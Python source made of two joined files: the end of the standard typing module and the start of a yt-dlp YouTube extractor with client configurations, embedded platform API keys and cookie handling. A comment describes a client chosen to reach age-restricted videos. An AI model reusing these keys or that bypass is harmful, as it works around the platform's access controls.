values: the argument list and the return type. The argument list
must be a list of types or ellipsis; the return type must be a single type.
There is no syntax to indicate optional or keyword arguments,
such function types are rarely used as callback types.
"""
AbstractSet = _alias(collections.abc.Set, 1, name='AbstractSet')
MutableSet = _alias(collections.abc.MutableSet, 1)
# NOTE: Mapping is only covariant in the value type.
Mapping = _alias(collections.abc.Mapping, 2)
MutableMapping = _alias(collections.abc.MutableMapping, 2)
Sequence = _alias(collections.abc.Sequence, 1)
MutableSequence = _alias(collections.abc.MutableSequence, 1)
ByteString = _alias(collections.abc.ByteString, 0) # Not generic
# Tuple accepts variable number of parameters.
Tuple = _TupleType(tuple, -1, inst=False, name='Tuple')
Tuple.__doc__ = \
"""Tuple type; Tuple[X, Y] is the cross-product type of X and Y.
Example: Tuple[T1, T2] is a tuple of two elements corresponding
to type variables T1 and T2. Tuple[int, float, str] is a tuple
of an int, a float and a string.
To specify a variable-length tuple of homogeneous type, use Tuple[T, ...].
"""
List = _alias(list, 1, inst=False, name='List')
Deque = _alias(collections.deque, 1, name='Deque')
Set = _alias(set, 1, inst=False, name='Set')
FrozenSet = _alias(frozenset, 1, inst=False, name='FrozenSet')
MappingView = _alias(collections.abc.MappingView, 1)
KeysView = _alias(collections.abc.KeysView, 1)
ItemsView = _alias(collections.abc.ItemsView, 2)
ValuesView = _alias(collections.abc.ValuesView, 1)
ContextManager = _alias(contextlib.AbstractContextManager, 1, name='ContextManager')
AsyncContextManager = _alias(contextlib.AbstractAsyncContextManager, 1, name='AsyncContextManager')
Dict = _alias(dict, 2, inst=False, name='Dict')
DefaultDict = _alias(collections.defaultdict, 2, name='DefaultDict')
OrderedDict = _alias(collections.OrderedDict, 2)
Counter = _alias(collections.Counter, 1)
ChainMap = _alias(collections.ChainMap, 2)
Generator = _alias(collections.abc.Generator, 3)
AsyncGenerator = _alias(collections.abc.AsyncGenerator, 2)
Type = _alias(type, 1, inst=False, name='Type')
Type.__doc__ = \
"""A special construct usable to annotate class objects.
For example, suppose we have the following classes::
class User: ... # Abstract base for User classes
class BasicUser(User): ...
class ProUser(User): ...
class TeamUser(User): ...
And a function that takes a class argument that's a subclass of
User and returns an instance of the corresponding class::
U = TypeVar('U', bound=User)
def new_user(user_class: Type[U]) -> U:
user = user_class()
# (Here we could write the user object to a database)
return user
joe = new_user(BasicUser)
At this point the type checker knows that joe has type BasicUser.
"""
@runtime_checkable
class SupportsInt(Protocol):
"""An ABC with one abstract method __int__."""
__slots__ = ()
@abstractmethod
def __int__(self) -> int:
pass
@runtime_checkable
class SupportsFloat(Protocol):
"""An ABC with one abstract method __float__."""
__slots__ = ()
@abstractmethod
def __float__(self) -> float:
pass
@runtime_checkable
class SupportsComplex(Protocol):
"""An ABC with one abstract method __complex__."""
__slots__ = ()
@abstractmethod
def __complex__(self) -> complex:
pass
@runtime_checkable
class SupportsBytes(Protocol):
"""An ABC with one abstract method __bytes__."""
__slots__ = ()
@abstractmethod
def __bytes__(self) -> bytes:
pass
@runtime_checkable
class SupportsIndex(Protocol):
"""An ABC with one abstract method __index__."""
__slots__ = ()
@abstractmethod
def __index__(self) -> int:
pass
@runtime_checkable
class SupportsAbs(Protocol[T_co]):
"""An ABC with one abstract method __abs__ that is covariant in its return type."""
__slots__ = ()
@abstractmethod
def __abs__(self) -> T_co:
pass
@runtime_checkable
class SupportsRound(Protocol[T_co]):
"""An ABC with one abstract method __round__ that is covariant in its return type."""
__slots__ = ()
@abstractmethod
def __round__(self, ndigits: int = 0) -> T_co:
pass
def _make_nmtuple(name, types, module, defaults = ()):
fields = [n for n, t in types]
types = {n: _type_check(t, f"field {n} annotation must be a type")
for n, t in types}
nm_tpl = collections.namedtuple(name, fields,
defaults=defaults, module=module)
nm_tpl.__annotations__ = nm_tpl.__new__.__annotations__ = types
return nm_tpl
# attributes prohibited to set in NamedTuple class syntax
_prohibited = frozenset({'__new__', '__init__', '__slots__', '__getnewargs__',
'_fields', '_field_defaults',
'_make', '_replace', '_asdict', '_source'})
_special = frozenset({'__module__', '__name__', '__annotations__'})
class NamedTupleMeta(type):
def __new__(cls, typename, bases, ns):
assert bases[0] is _NamedTuple
types = ns.get('__annotations__', {})
default_names = []
for field_name in types:
if field_name in ns:
default_names.append(field_name)
elif default_names:
raise TypeError(f"Non-default namedtuple field {field_name} "
f"cannot follow default field"
f"{'s' if len(default_names) > 1 else ''} "
f"{', '.join(default_names)}")
nm_tpl = _make_nmtuple(typename, types.items(),
defaults=[ns[n] for n in default_names],
module=ns['__module__'])
# update from user namespace without overriding special namedtuple attributes
for key in ns:
if key in _prohibited:
raise AttributeError("Cannot overwrite NamedTuple attribute " + key)
elif key not in _special and key not in nm_tpl._fields:
setattr(nm_tpl, key, ns[key])
return nm_tpl
def NamedTuple(typename, fields=None, /, **kwargs):
"""Typed version of namedtuple.
Usage in Python versions >= 3.6::
class Employee(NamedTuple):
name: str
id: int
This is equivalent to::
Employee = collections.namedtuple('Employee', ['name', 'id'])
The resulting class has an extra __annotations__ attribute, giving a
dict that maps field names to types. (The field names are also in
the _fields attribute, which is part of the namedtuple API.)
Alternative equivalent keyword syntax is also accepted::
Employee = NamedTuple('Employee', name=str, id=int)
In Python versions <= 3.5 use::
Employee = NamedTuple('Employee', [('name', str), ('id', int)])
"""
if fields is None:
fields = kwargs.items()
elif kwargs:
raise TypeError("Either list of fields or keywords"
" can be provided to NamedTuple, not both")
return _make_nmtuple(typename, fields, module=_caller())
_NamedTuple = type.__new__(NamedTupleMeta, 'NamedTuple', (), {})
def _namedtuple_mro_entries(bases):
if len(bases) > 1:
raise TypeError("Multiple inheritance with NamedTuple is not supported")
assert bases[0] is NamedTuple
return (_NamedTuple,)
NamedTuple.__mro_entries__ = _namedtuple_mro_entries
class _TypedDictMeta(type):
def __new__(cls, name, bases, ns, total=True):
"""Create new typed dict class object.
This method is called when TypedDict is subclassed,
or when TypedDict is instantiated. This way
TypedDict supports all three syntax forms described in its docstring.
Subclasses and instances of TypedDict return actual dictionaries.
"""
for base in bases:
if type(base) is not _TypedDictMeta:
raise TypeError('cannot inherit from both a TypedDict type '
'and a non-TypedDict base class')
tp_dict = type.__new__(_TypedDictMeta, name, (dict,), ns)
annotations = {}
own_annotations = ns.get('__annotations__', {})
own_annotation_keys = set(own_annotations.keys())
msg = "TypedDict('Name', {f0: t0, f1: t1, ...}); each t must be a type"
own_annotations = {
n: _type_check(tp, msg, module=tp_dict.__module__)
for n, tp in own_annotations.items()
}
required_keys = set()
optional_keys = set()
for base in bases:
annotations.update(base.__dict__.get('__annotations__', {}))
required_keys.update(base.__dict__.get('__required_keys__', ()))
optional_keys.update(base.__dict__.get('__optional_keys__', ()))
annotations.update(own_annotations)
if total:
required_keys.update(own_annotation_keys)
else:
optional_keys.update(own_annotation_keys)
tp_dict.__annotations__ = annotations
tp_dict.__required_keys__ = frozenset(required_keys)
tp_dict.__optional_keys__ = frozenset(optional_keys)
if not hasattr(tp_dict, '__total__'):
tp_dict.__total__ = total
return tp_dict
__call__ = dict # static method
def __subclasscheck__(cls, other):
# Typed dicts are only for static structural subtyping.
raise TypeError('TypedDict does not support instance and class checks')
__instancecheck__ = __subclasscheck__
def TypedDict(typename, fields=None, /, *, total=True, **kwargs):
"""A simple typed namespace. At runtime it is equivalent to a plain dict.
TypedDict creates a dictionary type that expects all of its
instances to have a certain set of keys, where each key is
associated with a value of a consistent type. This expectation
is not checked at runtime but is only enforced by type checkers.
Usage::
class Point2D(TypedDict):
x: int
y: int
label: str
a: Point2D = {'x': 1, 'y': 2, 'label': 'good'} # OK
b: Point2D = {'z': 3, 'label': 'bad'} # Fails type check
assert Point2D(x=1, y=2, label='first') == dict(x=1, y=2, label='first')
The type info can be accessed via the Point2D.__annotations__ dict, and
the Point2D.__required_keys__ and Point2D.__optional_keys__ frozensets.
TypedDict supports two additional equivalent forms::
Point2D = TypedDict('Point2D', x=int, y=int, label=str)
Point2D = TypedDict('Point2D', {'x': int, 'y': int, 'label': str})
By default, all keys must be present in a TypedDict. It is possible
to override this by specifying totality.
Usage::
class point2D(TypedDict, total=False):
x: int
y: int
This means that a point2D TypedDict can have any of the keys omitted.A type
checker is only expected to support a literal False or True as the value of
the total argument. True is the default, and makes all items defined in the
class body be required.
The class syntax is only supported in Python 3.6+, while two other
syntax forms work for Python 2.7 and 3.2+
"""
if fields is None:
fields = kwargs
elif kwargs:
raise TypeError("TypedDict takes either a dict or keyword arguments,"
" but not both")
ns = {'__annotations__': dict(fields)}
module = _caller()
if module is not None:
# Setting correct module is necessary to make typed dict classes pickleable.
ns['__module__'] = module
return _TypedDictMeta(typename, (), ns, total=total)
_TypedDict = type.__new__(_TypedDictMeta, 'TypedDict', (), {})
TypedDict.__mro_entries__ = lambda bases: (_TypedDict,)
class NewType:
"""NewType creates simple unique types with almost zero
runtime overhead. NewType(name, tp) is considered a subtype of tp
by static type checkers. At runtime, NewType(name, tp) returns
a dummy function that simply returns its argument. Usage::
UserId = NewType('UserId', int)
def name_by_id(user_id: UserId) -> str:
...
UserId('user') # Fails type check
name_by_id(42) # Fails type check
name_by_id(UserId(42)) # OK
num = UserId(5) + 1 # type: int
"""
__call__ = _idfunc
def __init__(self, name, tp):
self.__qualname__ = name
if '.' in name:
name = name.rpartition('.')[-1]
self.__name__ = name
self.__supertype__ = tp
def_mod = _caller()
if def_mod != 'typing':
self.__module__ = def_mod
def __repr__(self):
return f'{self.__module__}.{self.__qualname__}'
def __reduce__(self):
return self.__qualname__
def __or__(self, other):
return Union[self, other]
def __ror__(self, other):
return Union[other, self]
# Python-version-specific alias (Python 2: unicode; Python 3: str)
Text = str
# Constant that's True when type checking, but False here.
TYPE_CHECKING = False
class IO(Generic[AnyStr]):
"""Generic base class for TextIO and BinaryIO.
This is an abstract, generic version of the return of open().
NOTE: This does not distinguish between the different possible
classes (text vs. binary, read vs. write vs. read/write,
append-only, unbuffered). The TextIO and BinaryIO subclasses
below capture the distinctions between text vs. binary, which is
pervasive in the interface; however we currently do not offer a
way to track the other distinctions in the type system.
"""
__slots__ = ()
@property
@abstractmethod
def mode(self) -> str:
pass
@property
@abstractmethod
def name(self) -> str:
pass
@abstractmethod
def close(self) -> None:
pass
@property
@abstractmethod
def closed(self) -> bool:
pass
@abstractmethod
def fileno(self) -> int:
pass
@abstractmethod
def flush(self) -> None:
pass
@abstractmethod
def isatty(self) -> bool:
pass
@abstractmethod
def read(self, n: int = -1) -> AnyStr:
pass
@abstractmethod
def readable(self) -> bool:
pass
@abstractmethod
def readline(self, limit: int = -1) -> AnyStr:
pass
@abstractmethod
def readlines(self, hint: int = -1) -> List[AnyStr]:
pass
@abstractmethod
def seek(self, offset: int, whence: int = 0) -> int:
pass
@abstractmethod
def seekable(self) -> bool:
pass
@abstractmethod
def tell(self) -> int:
pass
@abstractmethod
def truncate(self, size: int = None) -> int:
pass
@abstractmethod
def writable(self) -> bool:
pass
@abstractmethod
def write(self, s: AnyStr) -> int:
pass
@abstractmethod
def writelines(self, lines: List[AnyStr]) -> None:
pass
@abstractmethod
def __enter__(self) -> 'IO[AnyStr]':
pass
@abstractmethod
def __exit__(self, type, value, traceback) -> None:
pass
class BinaryIO(IO[bytes]):
"""Typed version of the return of open() in binary mode."""
__slots__ = ()
@abstractmethod
def write(self, s: Union[bytes, bytearray]) -> int:
pass
@abstractmethod
def __enter__(self) -> 'BinaryIO':
pass
class TextIO(IO[str]):
"""Typed version of the return of open() in text mode."""
__slots__ = ()
@property
@abstractmethod
def buffer(self) -> BinaryIO:
pass
@property
@abstractmethod
def encoding(self) -> str:
pass
@property
@abstractmethod
def errors(self) -> Optional[str]:
pass
@property
@abstractmethod
def line_buffering(self) -> bool:
pass
@property
@abstractmethod
def newlines(self) -> Any:
pass
@abstractmethod
def __enter__(self) -> 'TextIO':
pass
class _DeprecatedType(type):
def __getattribute__(cls, name):
if name not in ("__dict__", "__module__") and name in cls.__dict__:
warnings.warn(
f"{cls.__name__} is deprecated, import directly "
f"from typing instead. {cls.__name__} will be removed "
"in Python 3.12.",
DeprecationWarning,
stacklevel=2,
)
return super().__getattribute__(name)
class io(metaclass=_DeprecatedType):
"""Wrapper namespace for IO generic classes."""
__all__ = ['IO', 'TextIO', 'BinaryIO']
IO = IO
TextIO = TextIO
BinaryIO = BinaryIO
io.__name__ = __name__ + '.io'
sys.modules[io.__name__] = io
Pattern = _alias(stdlib_re.Pattern, 1)
Match = _alias(stdlib_re.Match, 1)
class re(metaclass=_DeprecatedType):
"""Wrapper namespace for re type aliases."""
__all__ = ['Pattern', 'Match']
Pattern = Pattern
Match = Match
re.__name__ = __name__ + '.re'
sys.modules[re.__name__] = re
|
# coding: utf-8
from __future__ import unicode_literals
import calendar
import copy
import datetime
import functools
import hashlib
import itertools
import json
import math
import os.path
import random
import re
import sys
import time
import traceback
import threading
from .common import InfoExtractor, SearchInfoExtractor
from ..compat import (
compat_chr,
compat_HTTPError,
compat_parse_qs,
compat_str,
compat_urllib_parse_unquote_plus,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_urlparse,
)
from ..jsinterp import JSInterpreter
from ..utils import (
bug_reports_message,
clean_html,
datetime_from_str,
dict_get,
error_to_compat_str,
ExtractorError,
float_or_none,
format_field,
get_first,
int_or_none,
is_html,
join_nonempty,
js_to_json,
mimetype2ext,
network_exceptions,
NO_DEFAULT,
orderedSet,
parse_codecs,
parse_count,
parse_duration,
parse_iso8601,
parse_qs,
qualities,
remove_end,
remove_start,
smuggle_url,
str_or_none,
str_to_int,
strftime_or_none,
traverse_obj,
try_get,
unescapeHTML,
unified_strdate,
unified_timestamp,
unsmuggle_url,
update_url_query,
url_or_none,
urljoin,
variadic,
)
# any clients starting with _ cannot be explicity requested by the user
INNERTUBE_CLIENTS = {
'web': {
'INNERTUBE_API_KEY': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'WEB',
'clientVersion': '2.20211221.00.00',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 1
},
'web_embedded': {
'INNERTUBE_API_KEY': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'WEB_EMBEDDED_PLAYER',
'clientVersion': '1.20211215.00.01',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 56
},
'web_music': {
'INNERTUBE_API_KEY': 'AIzaSyC9XL3ZjWddXya6X74dJoCTL-WEYFDNX30',
'INNERTUBE_HOST': 'music.youtube.com',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'WEB_REMIX',
'clientVersion': '1.20211213.00.00',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 67,
},
'web_creator': {
'INNERTUBE_API_KEY': 'AIzaSyBUPetSUmoZL-OhlxA7wSac5XinrygCqMo',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'WEB_CREATOR',
'clientVersion': '1.20211220.02.00',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 62,
},
'android': {
'INNERTUBE_API_KEY': 'AIzaSyA8eiZmM1FaDVjRy-df2KTyQ_vz_yYM39w',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'ANDROID',
'clientVersion': '16.49',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 3,
'REQUIRE_JS_PLAYER': False
},
'android_embedded': {
'INNERTUBE_API_KEY': 'AIzaSyCjc_pVEDi4qsv5MtC2dMXzpIaDoRFLsxw',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'ANDROID_EMBEDDED_PLAYER',
'clientVersion': '16.49',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 55,
'REQUIRE_JS_PLAYER': False
},
'android_music': {
'INNERTUBE_API_KEY': 'AIzaSyAOghZGza2MQSZkY_zfZ370N-PUdXEo8AI',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'ANDROID_MUSIC',
'clientVersion': '4.57',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 21,
'REQUIRE_JS_PLAYER': False
},
'android_creator': {
'INNERTUBE_API_KEY': 'AIzaSyD_qjV8zaaUMehtLkrKFgVeSX_Iqbtyws8',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'ANDROID_CREATOR',
'clientVersion': '21.47',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 14,
'REQUIRE_JS_PLAYER': False
},
# iOS clients have HLS live streams. Setting device model to get 60fps formats.
# See: https://github.com/TeamNewPipe/NewPipeExtractor/issues/680#issuecomment-1002724558
'ios': {
'INNERTUBE_API_KEY': 'AIzaSyB-63vPrdThhKuerbB2N_l7Kwwcxj6yUAc',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'IOS',
'clientVersion': '16.46',
'deviceModel': 'iPhone14,3',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 5,
'REQUIRE_JS_PLAYER': False
},
'ios_embedded': {
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'IOS_MESSAGES_EXTENSION',
'clientVersion': '16.46',
'deviceModel': 'iPhone14,3',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 66,
'REQUIRE_JS_PLAYER': False
},
'ios_music': {
'INNERTUBE_API_KEY': 'AIzaSyBAETezhkwP0ZWA02RsqT1zu78Fpt0bC_s',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'IOS_MUSIC',
'clientVersion': '4.57',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 26,
'REQUIRE_JS_PLAYER': False
},
'ios_creator': {
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'IOS_CREATOR',
'clientVersion': '21.47',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 15,
'REQUIRE_JS_PLAYER': False
},
# mweb has 'ultralow' formats
# See: https://github.com/yt-dlp/yt-dlp/pull/557
'mweb': {
'INNERTUBE_API_KEY': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'MWEB',
'clientVersion': '2.20211221.01.00',
}
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 2
},
# This client can access age restricted videos (unless the uploader has disabled the 'allow embedding' option)
# See: https://github.com/zerodytrash/YouTube-Internal-Clients
'tv_embedded': {
'INNERTUBE_API_KEY': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8',
'INNERTUBE_CONTEXT': {
'client': {
'clientName': 'TVHTML5_SIMPLY_EMBEDDED_PLAYER',
'clientVersion': '2.0',
},
},
'INNERTUBE_CONTEXT_CLIENT_NAME': 85
},
}
def _split_innertube_client(client_name):
variant, *base = client_name.rsplit('.', 1)
if base:
return variant, base[0], variant
base, *variant = client_name.split('_', 1)
return client_name, base, variant[0] if variant else None
def build_innertube_clients():
THIRD_PARTY = {
'embedUrl': 'https://www.youtube.com/', # Can be any valid URL
}
BASE_CLIENTS = ('android', 'web', 'tv', 'ios', 'mweb')
priority = qualities(BASE_CLIENTS[::-1])
for client, ytcfg in tuple(INNERTUBE_CLIENTS.items()):
ytcfg.setdefault('INNERTUBE_API_KEY', 'AIzaSyDCU8hByM-4DrUqRUYnGn-3llEO78bcxq8')
ytcfg.setdefault('INNERTUBE_HOST', 'www.youtube.com')
ytcfg.setdefault('REQUIRE_JS_PLAYER', True)
ytcfg['INNERTUBE_CONTEXT']['client'].setdefault('hl', 'en')
_, base_client, variant = _split_innertube_client(client)
ytcfg['priority'] = 10 * priority(base_client)
if not variant:
INNERTUBE_CLIENTS[f'{client}_embedscreen'] = embedscreen = copy.deepcopy(ytcfg)
embedscreen['INNERTUBE_CONTEXT']['client']['clientScreen'] = 'EMBED'
embedscreen['INNERTUBE_CONTEXT']['thirdParty'] = THIRD_PARTY
embedscreen['priority'] -= 3
elif variant == 'embedded':
ytcfg['INNERTUBE_CONTEXT']['thirdParty'] = THIRD_PARTY
ytcfg['priority'] -= 2
else:
ytcfg['priority'] -= 3
build_innertube_clients()
class YoutubeBaseInfoExtractor(InfoExtractor):
"""Provide base functions for Youtube extractors"""
_RESERVED_NAMES = (
r'channel|c|user|playlist|watch|w|v|embed|e|watch_popup|clip|'
r'shorts|movies|results|search|shared|hashtag|trending|explore|feed|feeds|'
r'browse|oembed|get_video_info|iframe_api|s/player|'
r'storefront|oops|index|account|reporthistory|t/terms|about|upload|signin|logout')
_PLAYLIST_ID_RE = r'(?:(?:PL|LL|EC|UU|FL|RD|UL|TL|PU|OLAK5uy_)[0-9A-Za-z-_]{10,}|RDMM|WL|LL|LM)'
# _NETRC_MACHINE = 'youtube'
# If True it will raise an error if no login info is provided
_LOGIN_REQUIRED = False
_INVIDIOUS_SITES = (
# invidious-redirect websites
r'(?:www\.)?redirect\.invidious\.io',
r'(?:(?:www|dev)\.)?invidio\.us',
# Invidious instances taken from https://github.com/iv-org/documentation/blob/master/Invidious-Instances.md
r'(?:www\.)?invidious\.pussthecat\.org',
r'(?:www\.)?invidious\.zee\.li',
r'(?:www\.)?invidious\.ethibox\.fr',
r'(?:www\.)?invidious\.3o7z6yfxhbw7n3za4rss6l434kmv55cgw2vuziwuigpwegswvwzqipyd\.onion',
r'(?:www\.)?osbivz6guyeahrwp2lnwyjk2xos342h4ocsxyqrlaopqjuhwn2djiiyd\.onion',
r'(?:www\.)?u2cvlit75owumwpy4dj2hsmvkq7nvrclkpht7xgyye2pyoxhpmclkrad\.onion',
# youtube-dl invidious instances list
r'(?:(?:www|no)\.)?invidiou\.sh',
r'(?:(?:www|fi)\.)?invidious\.snopyta\.org',
r'(?:www\.)?invidious\.kabi\.tk',
r'(?:www\.)?invidious\.mastodon\.host',
r'(?:www\.)?invidious\.zapashcanon\.fr',
r'(?:www\.)?(?:invidious(?:-us)?|piped)\.kavin\.rocks',
r'(?:www\.)?invidious\.tinfoil-hat\.net',
r'(?:www\.)?invidious\.himiko\.cloud',
r'(?:www\.)?invidious\.reallyancient\.tech',
r'(?:www\.)?invidious\.tube',
r'(?:www\.)?invidiou\.site',
r'(?:www\.)?invidious\.site',
r'(?:www\.)?invidious\.xyz',
r'(?:www\.)?invidious\.nixnet\.xyz',
r'(?:www\.)?invidious\.048596\.xyz',
r'(?:www\.)?invidious\.drycat\.fr',
r'(?:www\.)?inv\.skyn3t\.in',
r'(?:www\.)?tube\.poal\.co',
r'(?:www\.)?tube\.connect\.cafe',
r'(?:www\.)?vid\.wxzm\.sx',
r'(?:www\.)?vid\.mint\.lgbt',
r'(?:www\.)?vid\.puffyan\.us',
r'(?:www\.)?yewtu\.be',
r'(?:www\.)?yt\.elukerio\.org',
r'(?:www\.)?yt\.lelux\.fi',
r'(?:www\.)?invidious\.ggc-project\.de',
r'(?:www\.)?yt\.maisputain\.ovh',
r'(?:www\.)?ytprivate\.com',
r'(?:www\.)?invidious\.13ad\.de',
r'(?:www\.)?invidious\.toot\.koeln',
r'(?:www\.)?invidious\.fdn\.fr',
r'(?:www\.)?watch\.nettohikari\.com',
r'(?:www\.)?invidious\.namazso\.eu',
r'(?:www\.)?invidious\.silkky\.cloud',
r'(?:www\.)?invidious\.exonip\.de',
r'(?:www\.)?invidious\.riverside\.rocks',
r'(?:www\.)?invidious\.blamefran\.net',
r'(?:www\.)?invidious\.moomoo\.de',
r'(?:www\.)?ytb\.trom\.tf',
r'(?:www\.)?yt\.cyberhost\.uk',
r'(?:www\.)?kgg2m7yk5aybusll\.onion',
r'(?:www\.)?qklhadlycap4cnod\.onion',
r'(?:www\.)?axqzx4s6s54s32yentfqojs3x5i7faxza6xo3ehd4bzzsg2ii4fv2iid\.onion',
r'(?:www\.)?c7hqkpkpemu6e7emz5b4vyz7idjgdvgaaa3dyimmeojqbgpea3xqjoid\.onion',
r'(?:www\.)?fz253lmuao3strwbfbmx46yu7acac2jz27iwtorgmbqlkurlclmancad\.onion',
r'(?:www\.)?invidious\.l4qlywnpwqsluw65ts7md3khrivpirse744un3x7mlskqauz5pyuzgqd\.onion',
r'(?:www\.)?owxfohz4kjyv25fvlqilyxast7inivgiktls3th44jhk3ej3i7ya\.b32\.i2p',
r'(?:www\.)?4l2dgddgsrkf2ous66i6seeyi6etzfgrue332grh2n7madpwopotugyd\.onion',
r'(?:www\.)?w6ijuptxiku4xpnnaetxvnkc5vqcdu7mgns2u77qefoixi63vbvnpnqd\.onion',
r'(?:www\.)?kbjggqkzv65ivcqj6bumvp337z6264huv5kpkwuv6gu5yjiskvan7fad\.onion',
r'(?:www\.)?grwp24hodrefzvjjuccrkw3mjq4tzhaaq32amf33dzpmuxe7ilepcmad\.onion',
r'(?:www\.)?hpniueoejy4opn7bc4ftgazyqjoeqwlvh2uiku2xqku6zpoa4bf5ruid\.onion',
)
def _initialize_consent(self):
cookies = self._get_cookies('https://www.youtube.com/')
if cookies.get('__Secure-3PSID'):
return
consent_id = None
consent = cookies.get('CONSENT')
if consent:
if 'YES' in consent.value:
return
consent_id = self._search_regex(
r'PENDING\+(\d+)', consent.value, 'consent', default=None)
if not consent_id:
consent_id = random.randint(100, 999)
self._set_cookie('.youtube.com', 'CONSENT', 'YES+cb.20210328-17-p0.en+FX+%s' % consent_id)
def _initialize_pref(self):
cookies = self._get_cookies('https://www.youtube.com/')
pref_cookie = cookies.get('PREF')
pref = {}
if pref_cookie:
try:
pref = dict(compat_urlparse.parse_qsl(pref_cookie.value))
except ValueError:
self.report_warning('Failed to parse user PREF cookie' + bug_reports_message())
pref.update({'hl': 'en', 'tz': 'UTC'})
self._set_cookie('.youtube.com', name='PREF', value=compat_urllib_parse_urlencode(pref))
def _real_initialize(self):
self._initialize_pref()
self._initialize_consent()
if (self._LOGIN_REQUIRED
and self.get_param('cookiefile') is None
and self.get_param('cookiesfrombrowser') is None):
self.raise_login_required('Login details are needed to download this content', method='cookies')
_YT_INITIAL_DATA_RE = r'(?:window\s*\[\s*["\']ytInitialData["\']\s*\]|ytInitialData)\s*=\s*({.+?})\s*;'
_YT_INITIAL_PLAYER_RESPONSE_RE = r'ytInitialPlayerResponse\s*=\s*({.+?})\s*;'
_YT_INITIAL_BOUNDARY_RE = r'(?:var\s+meta|</script|\n)'
def _get_default_ytcfg(self, client='web'):
return copy.deepcopy(INNERTUBE_CLIENTS[client])
def _get_innertube_host(self, client='web'):
return INNERTUBE_CLIENTS[client]['INNERTUBE_HOST']
def _ytcfg_get_safe(self, ytcfg, getter, expected_type=None, default_client='web'):
# try_get but with fallback to default ytcfg client values when present
_func = lambda y: try_get(y, getter, expected_type)
return _func(ytcfg) or _func(self._get_default_ytcfg(default_client))
def _extract_client_name(self, ytcfg, default_client='web'):
return self._ytcfg_get_safe(
ytcfg, (lambda x: x['INNERTUBE_CLIENT_NAME'],
lambda x: x['INNERTUBE_CONTEXT']['client']['clientName']), compat_str, default_client)
def _extract_client_version(self, ytcfg, default_client='web'):
return self._ytcfg_get_safe(
ytcfg, (lambda x: x['INNERTUBE_CLIENT_VERSION'],
lambda x: x['INNERTUBE_CONTEXT']['client']['clientVersion']), compat_str, default_client)
def _extract_api_key(self, ytcfg=None, default_client='web'):
return self._ytcfg_get_safe(ytcfg, lambda x: x['INNERTUBE_API_KEY'], compat_str, default_client)
def _extract_context(self, ytcfg=None, default_client='web'):
context = get_first(
(ytcfg, self._get_default_ytcfg(default_client)), 'INNERTUBE_CONTEXT', expected_type=dict)
# Enforce language and tz for extraction
client_context = traverse_obj(context, 'client', expected_type=dict, default={})
client_context.update({'hl': 'en', 'timeZone': 'UTC', 'utcOffsetMinutes': 0})
return context
_SAPISID = None
def _generate_sapisidhash_header(self, origin='https://www.youtube.com'):
time_now = round(time.time())
if self._SAPISID is None:
yt_cookies = self._get_cookies('https://www.youtube.com')
# Sometimes SAPISID cookie isn't present but __Secure-3PAPISID is.
# See: https://github.com/yt-dlp/yt-dlp/issues/393
sapisid_cookie = dict_get(
yt_cookies, ('__Secure-3PAPISID', 'SAPISID'))
if sapisid_cookie and sapisid_cookie.value:
self._SAPISID = sapisid_cookie.value
self.write_debug('Extracted SAPISID cookie')
# SAPISID cookie is required if not already present
if not yt_cookies.get('SAPISID'):
self.write_debug('Copying __Secure-3PAPISID cookie to SAPISID cookie')
self._set_cookie(
'.youtube.com', 'SAPISID', self._SAPISID, secure=True, expire_time=time_now + 3600)
else:
self._SAPISID = False
if not self._SAPISID:
return None
# SAPISIDHASH algorithm from https://stackoverflow.com/a/32065323
sapisidhash = hashlib.sha1(
f'{time_now} {self._SAPISID} {origin}'.encode('utf-8')).hexdigest()
return f'SAPISIDHASH {time_now}_{sapisidhash}'
def _call_api(self, ep, query, video_id, fatal=True, headers=None,
note='Downloading API JSON', errnote='Unable to download API page',
context=None, api_key=None, api_hostname=None, default_client='web'):
data = {'context': context} if context else {'context': self._extract_context(default_client=default_client)}
data.update(query)
real_headers = self.generate_api_headers(default_client=default_client)
real_headers.update({'content-type': 'application/json'})
if headers:
real_headers.update(headers)
return self._download_json(
'https://%s/youtubei/v1/%s' % (api_hostname or self._get_innertube_host(default_client), ep),
video_id=video_id, fatal=fatal, note=note, errnote=errnote,
data=json.dumps(data).encode('utf8'), headers=real_headers,
query={'key': api_key or self._extract_api_key(), 'prettyPrint': 'false'})
def extract_yt_initial_data(self, item_id, webpage, fatal=True):
data = self._search_regex(
(r'%s\s*%s' % (self._YT_INITIAL_DATA_RE, self._YT_INITIAL_BOUNDARY_RE),
self._YT_INITIAL_DATA_RE), webpage, 'yt initial data', fatal=fatal)
if data:
return self._parse_json(data, item_id, fatal=fatal)
@staticmethod
def _extract_session_index(*data):
"""
Index of current account in account list.
See: https://github.com/yt-dlp/yt-dlp/pull/519
"""
for ytcfg in data:
